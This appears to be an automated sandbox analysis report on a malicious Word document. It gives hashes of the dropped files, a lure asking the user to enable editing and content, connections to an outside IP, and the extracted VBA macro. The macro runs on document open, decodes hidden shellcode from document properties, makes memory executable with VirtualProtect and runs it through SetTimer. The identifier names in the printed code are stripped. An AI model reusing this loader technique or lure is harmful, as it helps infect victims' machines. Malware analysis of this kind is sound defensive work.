Preview:.PNG........IHDR.......8......X.L.. .IDATx..}i..F.-..\r.E.l..u..3....L....^TR-.......DF...*I.e;i.:U.L&...pq.p.1.HD.Z.@.6.._cc..........>.n....2v..c.%...)..G.?|...>k...bf......c0.sy..$...a....<.......>".=X1.....1.^I|......|!.....I`E..c.#.T......'.'.....$6&L1.0.H...X&".cp.l...p.>..?.@?.1.Tp.....Y...=D.]....).w=...~..yp...{x/......d}1.G.h..b."1..-}.0x...O.......<. &n...0.1...eI...."".. ....C<t..A.H..4O.L.G....v...6Bd....W{..>..;W.....E.#<..s.^...Q...B.o.=l.lB{...1.ab.$D..:WB$O..V..>..k...y~.w".....A...-.D..;.I.4b.D..E".3...1...f....J.~xv.35G&&....?.acR...P.N....)...U.J....F.I...c$... .....a..z&...1..I...D...b.A4.......U.._.D.Z...E.6.G9t..=..qj...^L.$.;...>..S&dD.X... 1...0.{~.w..P.....1.U(.....j.PM......9J..[.O2...).12swy%.3..M?NGt_.......Z..........?F..+.....[4@.=.......;.".6..i.c..qH4...Ll...8.kI....="".!..h.g7.\'......Bb.A...f..o).+..`..++..?u..<.i.M..Gvs..@w.$.2X..'.[.h.8h.3..G.g.E...3..d.)..V*../$)...."%...F....~...s.1@|.....dE.8D|..d..........N.z..(...
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:PNG image data, 440 x 440, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):256382
Entropy (8bit):7.980585954508351
Encrypted:false
SSDEEP:6144:mCEm3Vq8LdNmYXjyTmRwYbWgGBtvnYA96+jNztlbEgM:pEmlvWwy2xbiBmb+Zztlbg
MD5:7C4404A9A30A9E0DBC736DADB560C774
SHA1:34122AE87D3DA63C05DB71E043BE6E5641D8F4ED
SHA-256:964ADAD2626BEAE97F471D03E04D03D51C03551E69C803CDE0752478EE37EDC4
SHA-512:176AAA14ABAA29353A3F5CD1EF8BE6725B60FF363A2F24619617D7BE13B4DBC4ACF74DE3559711068219BA3011DF265237EF64C58F79E6789C64C6454BBA1CAA
Malicious:false
Reputation:low
Preview:.PNG........IHDR.............7......sRGB.........gAMA......a.....pHYs..!...!..........IDATx^.....Eu..u.O&.$..}g>..I..Q1.h...Kb.Jo..D.D....M[q...Wh...*.q.!:..D..C.Q.#.,...;........w.s9].......S.N.SuNU=...}...B..F...A.t.....,Z.m.....j.B....=qI...m>..3....a........ce..YU}.`..Hz...o.@.Z<..._a.?...U...t.Ihyz...{......,y.....<.....R|..O<.'iU...BK..kh.\.}P..i.5.d.......Cx...,3V....4.'/...d>.Z6e'.c...B....TYm....m...b. .=.LU..^yk>......v..K..-O.#.z..@...i.Pa..........ph.*...p-T\K..jH..1H..gHhqm......'Tz..*......o.R.u.rf.....6.......K}H.....B.W:qmSB..*.t...N...1.1|.m.2.*>!q._*...z.@M'.|K...s....L/.......4q.s.JL8.a.1\../.m.B..E.t.ii..o.P....I\B.K|..m'W..M....p..N.....[\...2.A..5...O\.V.-..._.3.t..2...|...@..m..J..3.0... c...'..2.....Z|......3.....^..1.'....I..-.....7.V...K'.xj....t.@..m~...K.!_q-..h..Kh.&..Y....g.M.q......-.....'..5..1....Z|...Oh..!......T.L.........\....A....m...p=|..^...Vn....[.....2$.|...p.=|..1\./5^*..+=a..B..t.W..oqm;*=...'m..3.->e.x.
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):28672
Entropy (8bit):4.002674844054299
Encrypted:false
SSDEEP:384:Otsky8JS9wT6fXlm/uLtk+y8JS9wT6fXlm/u:/ky8RmdFe+y8RmdF
MD5:6A8285312F2D5A09185318A91E28993F
SHA1:EB0248F7EA6586FB51217C463283DB03496780FE
SHA-256:FA3907879337F61E602FEF559DDA753D7A6CE97B93FF5E46D11E4D57F2A7B4AD
SHA-512:3BFB5E62972F6FE3427365F45429C3D9E2CC2A6A010326F3AF2168DC5FA652A763652A085FBC6911E36EAD16AAEE928DD25930E9035C76A8B6FAF99BB92A3F89
Malicious:false
Reputation:low
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................(.......................................................................................................4...)...............................................*...+...,...-......./...0...1...2...3...5...6.......................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1024
Entropy (8bit):0.05390218305374581
Encrypted:false
SSDEEP:3:ol3lYdn:4Wn
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:false
Reputation:high, very likely benign file
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1536
Entropy (8bit):2.1316685601583454
Encrypted:false
SSDEEP:12:DMlzfRLZRW4WZ1MFKuQ9cc3xn82l0kwkvEzF4ipOO4jO4Pll8OHkUZ08/W4c:4LG1ND9Pxn82GkoFXpOOWOYqOHiJz
MD5:4BC8627D21650763B6FE360EE6D71C61
SHA1:F5F15E24D35CBC67A4BC8279E1EB9036FB7E8F9B
SHA-256:3675A775E98B8A89485D1528246FC5F08A775D8FB59BFFE75F3E0C06DBDD8C99
SHA-512:DCA12BDA8958114D7EAFB1537FDD9F28E4A90F0626975AD6066511EC0860AE49B509CF6849BEEF92D7FF5929A8922F30CC7B7A0D4A72489EBF3FFAC6F57C9A91
Malicious:false
Reputation:low
Preview:.././...T.h.i.s. .d.o.c.u.m.e.n.t. .c.r.e.a.t.e.d. .i.n. .p.r.e.v.i.o.u.s. .v.e.r.s.i.o.n. .o.f. .M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .W.o.r.d.....T.o. .v.i.e.w. .o.r. .e.d.i.t. .t.h.i.s. .d.o.c.u.m.e.n.t.,. .p.l.e.a.s.e. .c.l.i.c.k. .. E.n.a.b.l.e. .e.d.i.t.i.n.g.. .b.u.t.t.o.n. .o.n. .t.h.e. .t.o.p. .b.a.r.,. .a.n.d. .t.h.e.n. .c.l.i.c.k. .. E.n.a.b.l.e. .c.o.n.t.e.n.t.. ..........................................................................................................................................................z.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):60416
Entropy (8bit):4.1510654116302925
Encrypted:false
SSDEEP:768:oM10nzOxhm5dcQ1vl+u/yqZjcRm2vPWWHBG9vcMbAnOzGqag:oMszOxMcQ1t+u/ZkPWGBG6MbEOzGqag
MD5:B36786485381BF92841387855764E377
SHA1:E2852619C35C125FEF16687FB0F0822F40B6EE0F
SHA-256:E0AFD6DD69152B8ADF7864BFA54EDF515E0ED4EE6F30830733A865CD781A764C
SHA-512:D770AC19648993E4F9D0B1253B741362E19D177EC1ECABF2544227F9DEE23BC4807EAEFF48A71205050C9C383195CCEF34ECD3A764E5D2E6850A5CE5386372BC
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
Preview:......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...........(........................................................................................................... ...!..."...#...$...%...&...'.......)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:.......<...=...>...?...@...I...B...C...D...E...F...G...H...;...J...K...L...M...N...O...P...Q...R...S.......`...V...W...X...Y...Z...]...\.......i..._...........b...c...d...e...f...g...h...[...j...k...t...m...n...o...p...q...r...s...^...........................
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:54 2022, mtime=Tue Mar 8 15:45:54 2022, atime=Fri Aug 12 02:15:14 2022, length=2298562, window=hide
Category:dropped
Size (bytes):1069
Entropy (8bit):4.566286061014149
Encrypted:false
SSDEEP:12:8UllE9RgXg/XAlCPCHaXBKBnB/xQpX+Wyfai2rbtKicvbfj7lL8nrRDtZ3YilMMx:8Ull+/XTRKJI8ft2lhe/dUtDv3qhu7D
MD5:C04BDC3EC1DB9AB54B3956ED94A5BA47
SHA1:8BD62D013BC6926A12085610AE577E968D0738CA
SHA-256:79C435145F2068B9E193FCDC377D8A83B0AC76E7A8E5032A7C20948B0286292F
SHA-512:59C5F155C382E5966F1EECC22F2B808E6449B75624ED9B8F58892C9C92ECA480D2249A318A7501724DF86BD90459B3C89B32563CB5F689597DBD5B255AB6594D
Malicious:false
Preview:L..................F.... ....Gt..3...Gt..3..........#..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2...#..U.. .BALLFI~1.DOC..`......hT..hT..*...r.....'...............b.a.l.l.f.i.n.,.f.i.l.e.,.0.8...1.1...2.2...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\651689\Users.user\Desktop\ballfin,file,08.11.22.doc.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.b.a.l.l.f.i.n.,.f.i.l.e.,.0.8...1.1...2.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......651689.........
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):93
Entropy (8bit):4.673845646189702
Encrypted:false
SSDEEP:3:bDuMJlfgJobUmX1bbUv:bCUgJobnb2
MD5:03A526D93334A45B213FAD84E03EFABA
SHA1:115F355E07FA4B5CCAAF08F727666F2B34661242
SHA-256:12EC622940C8C4B506A5BFD1ABE7F99EE4F3561A2D7B5DB1C7094AF1FF457FCA
SHA-512:8BB4251682F8D6575C307EECD5F57121D91E570F04DCDBBBA5A18014E0009C8DEC01E4242FF3F562E6BFDF6A3E08146F0A675109A2E8627318579AB4B2C85161
Malicious:false
Preview:[folders]..Templates.LNK=0..ballfin,file,08.11.22.LNK=0..[doc]..ballfin,file,08.11.22.LNK=0..
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.503835550707525
Encrypted:false
SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:false
Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Little-endian UTF-16 Unicode text, with no line terminators
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:Qn:Qn
MD5:F3B25701FE362EC84616A93A45CE9998
SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:false
Preview:..
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.503835550707525
Encrypted:false
SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:false
Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
File type:Zip archive data, at least v2.0 to extract
Entropy (8bit):7.9931718162127225
TrID:
  • Word Microsoft Office Open XML Format document (49504/1) 49.01%
  • Word Microsoft Office Open XML Format document (43504/1) 43.07%
  • ZIP compressed archive (8000/1) 7.92%
File name:ballfin,file,08.11.22.doc
File size:2298562
MD5:75d17f46accbe980e1deb28dd7513085
SHA1:6ae88b35e85f6fbb55584893f696f859dccfedc2
SHA256:4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777
SHA512:e9959f74b0c4cb34c1167eb622fbdd8ae8bbeb808ca8d6680bc82f22c9d0566b6dac30b1376837fd54a4b21bac7af414bccc90e849ec32b2f78564d98bf5674f
SSDEEP:49152:NOUM0iO62qwcjsAGQnvISJw3zMtsqF+MhVo6H8LvdQ7yh4SbCu+o:gUmXIA+SJw3z++CcyM4yb
TLSH:75B53393D127F54CDD4616AD638825F65FF10327189EE9AB03BA2606D38F1BF0C9958C
File Content Preview:PK..........!..U~............._rels/.rels...J.@............4.E..D.....$....T..w-..j........|.zs..z..z.*X.%(v......6O.{PI........`S__._x .C..CR....:....t..R......hI.3..H.Q..*.;..=..y... n.......yo.......[vrf..A..6..3[.>_...-K....\NH!....<..r...E.B..P...<_.
Icon Hash:e4eea2aaa4b4b4a4
Document Type:OpenXML
Number of OLE Files:1
Has Summary Info:
Application Name:
Encrypted Document:False
Contains Word Document Stream:True
Contains Workbook/Book Stream:False
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:False
Flash Objects Count:0
Contains VBA Macros:True
General
Stream Path:VBA/ThisDocument
VBA File Name:ThisDocument.cls
Stream Size:2769
Data ASCII:. . . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t @ i o n . . . . . . . . L i . b " u s e r 3 . 2 " A l i a s . " K i l l T i . m e r " ( B y 0 V a l . . . A @ s L o n g . . , . . $ ' . . .
Data Raw:01 d6 b4 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function  Lib "user32" Alias "KillTimer" (ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
Private Declare PtrSafe Function  Lib "kernel32" Alias "VirtualProtect" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr,  As LongPtr) As LongPtr
Private Declare PtrSafe Function  Lib "user32" Alias "SetTimer" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
Function ()
     = 9
    End Function
Function ()
    #If Win64 Then
         = True
    #Else
         = False
    #End If
End Function
Public Function kODKXd767UH(strInput)
        kODKXd767UH = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
    End Function
Function ()
     = 5
    End Function
Sub (w)
    Dim  As Long
    Dim  As Long
     = () + ()
    Do
         = ()
        DoEvents
    Loop Until  > 
End Sub
Function (Optional  = False)
    If  Then
        Set  = ActiveDocument
    Else
        Set  = (())
    End If
    Set  = 
    End Function
Private Sub Document_Open()
    Dim () As Byte
    If () Then
         = ((kODKXd767UH("dIh2GUmUW")).Value)
    Else
         = ((kODKXd767UH("tgKi2gkQwj")).Value)
    End If
    Dim  As LongPtr
    Dim  As LongPtr
    Dim  As LongPtr
    Dim  As LongPtr
     = () + 1
     = VarPtr((0))
     , , 64, VarPtr()
            ()(kODKXd767UH("JojpEdbSVTKo")) = kODKXd767UH("sc1j1QJaF")
         = (0, , 1, )
     1
     0, 
    ().Remove (kODKXd767UH("qpSuoM7k"))
    ().Remove (kODKXd767UH("BIAcobr1"))
    ReDim (1)
End Sub
Function (, , Optional  = False)
    If  Then
         = Mid(,  + 1, 1)
    Else
         = ((), , )
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
         = UBound()
    Else
         = ((), )
    End If
     = 
    End Function
Function ()
     = 0
    End Function
Function ()
     = 11
    End Function
Function ()
     = 4
    End Function
Function (, Optional  = False)
    If  Then
         = Len()
    Else
         = ((), )
    End If
     = 
    End Function
Function (Optional  = False)
    If  Then
        Set  = CallByName((kODKXd767UH("AChdywmAbLxco")), kODKXd767UH("rlsuO4sYe_eK"), VbGet, kODKXd767UH("VUfXb8n"))
    Else
        Set  = (())
    End If
    Set  = 
    End Function
Function (, Optional  = False)
    If  Then
         = CDec()
    Else
         = ((), )
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
         = VarPtr()
    Else
         = ((), )
    End If
     = 
    End Function
Function ()
     = 2
    End Function
Function ()
     = 10
    End Function
Function ()
     = 7
    End Function
Function ()
     = 1
    End Function
Function (, )
     = Mid(,  + 1, 1)
End Function
Function ()
     = 6
    End Function
Function ()
     = 3
    End Function
Function ()
    ReDim (() - 1) As Byte
    Dim  As Long,  As Long
    Dim :  = kODKXd767UH("kTlu2chDwOPK") & kODKXd767UH("zCjkcydUhHLp")
    For  = 0 To () - 1 Step 2
         =  / 2
        () = 255 - ( & (, ) & (,  + 1))
    Next
     = 
End Function
Function (, Optional  = False)
    If  Then
        Set  = GetObject()
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function (, Optional  = False)
    If  Then
        Set  = CallByName((), kODKXd767UH("fbDGioXv"), VbGet, )
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function (Optional  = False)
    If  Then
         = Timer()
    Else
         = (())
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
        Set  = CallByName((), kODKXd767UH("tvPEflXhf5Z_"), VbGet, )
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function (, Optional  = False)
    If  Then
         = ()
    Else
         = ((), )
    End If
     = 
    End Function
Function ()
     = 8
    End Function
Function (, Optional  = Empty, Optional  = Empty, Optional  = Empty)
    Select Case 
            Case ()
                Set  = (, True)
            Case ()
                Set  = (, True)
            Case ()
                Set  = (True)
            Case ()
                Set  = (True)
            Case ()
                Set  = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, , True)
            Case ()
                 = (True)
            Case ()
                 = (, True)
        End Select
End Function

General
Stream Path:PROJECT
File Type:ASCII text, with CRLF line terminators
Stream Size:369
Entropy:5.253715637016501
Base64 Encoded:True
Data ASCII:I D = " { F 7 1 8 A 5 4 1 - 6 F A D - 4 9 9 A - B 2 A 3 - 8 5 4 E 0 6 8 A 7 6 A 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F D F F 1 5 1 A E F 1 3 F 3 1 3 F 3 1 3 F 3 1 3 F 3 " . . D P B = " F A F 8 1 2 1 D 0 E 1 E 0 E 1 E 0 E " . . G C = " F 7 F 5 1 F 2 0 E 1 E 0 D F E 1 D F E 1 2 0 " . . . . [ H o s t E x t e n d e r I n f
Data Raw:49 44 3d 22 7b 46 37 31 38 41 35 34 31 2d 36 46 41 44 2d 34 39 39 41 2d 42 32 41 33 2d 38 35 34 45 30 36 38 41 37 36 41 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
General
Stream Path:PROJECTwm
File Type:data
Stream Size:41
Entropy:3.0773844850752607
Base64 Encoded:False
Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
General
Stream Path:VBA/_VBA_PROJECT
File Type:ISO-8859 text, with no line terminators
Stream Size:7
Entropy:1.8423709931771088
Base64 Encoded:False
Data ASCII:a . . .
Data Raw:cc 61 ff ff 00 00 00
General
Stream Path:VBA/__SRP_2
File Type:data
Stream Size:5116
Entropy:1.9292601170451005
Base64 Encoded:False
Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . " . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:72 55 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 22 00 1f 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
General
Stream Path:VBA/__SRP_3
File Type:data
Stream Size:2724
Entropy:2.696829186323428
Base64 Encoded:False
Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . P . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . , . . p . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . ` . . . . . . . . . . . . . \\ . . p . . . . . . A . . . . . . . . . . . . . . . . . . . .
Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 50 00 c1 08 00 00 00 00 00 00 00 00 00 00 00 00 04 70 08 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
General
Stream Path:VBA/dir
File Type:data
Stream Size:486
Entropy:6.294817845464784
Base64 Encoded:True
Data ASCII:. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . . J d - . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ s y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c E C . . . . . m . ! O f f i c g O . f . i . c g . . g 2 D F 8 D 0 . 4 C - 5 B F A
Data Raw:01 e2 b1 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 0e 4a f4 64 2d 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30
TimestampSource PortDest PortSource IPDest IP
Aug 11, 2022 20:14:34.314097881 CEST4917380192.168.2.2245.8.146.139
Aug 11, 2022 20:14:37.329427958 CEST4917380192.168.2.2245.8.146.139
Aug 11, 2022 20:14:43.335854053 CEST4917380192.168.2.2245.8.146.139
Aug 11, 2022 20:14:55.361140013 CEST4917480192.168.2.2245.8.146.139
Aug 11, 2022 20:14:58.344629049 CEST4917480192.168.2.2245.8.146.139
Aug 11, 2022 20:15:04.350992918 CEST4917480192.168.2.2245.8.146.139

Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Target ID:0
Start time:20:15:15
Start date:11/08/2022
Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):false
Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:0x13f4f0000
File size:1423704 bytes
MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

No disassembly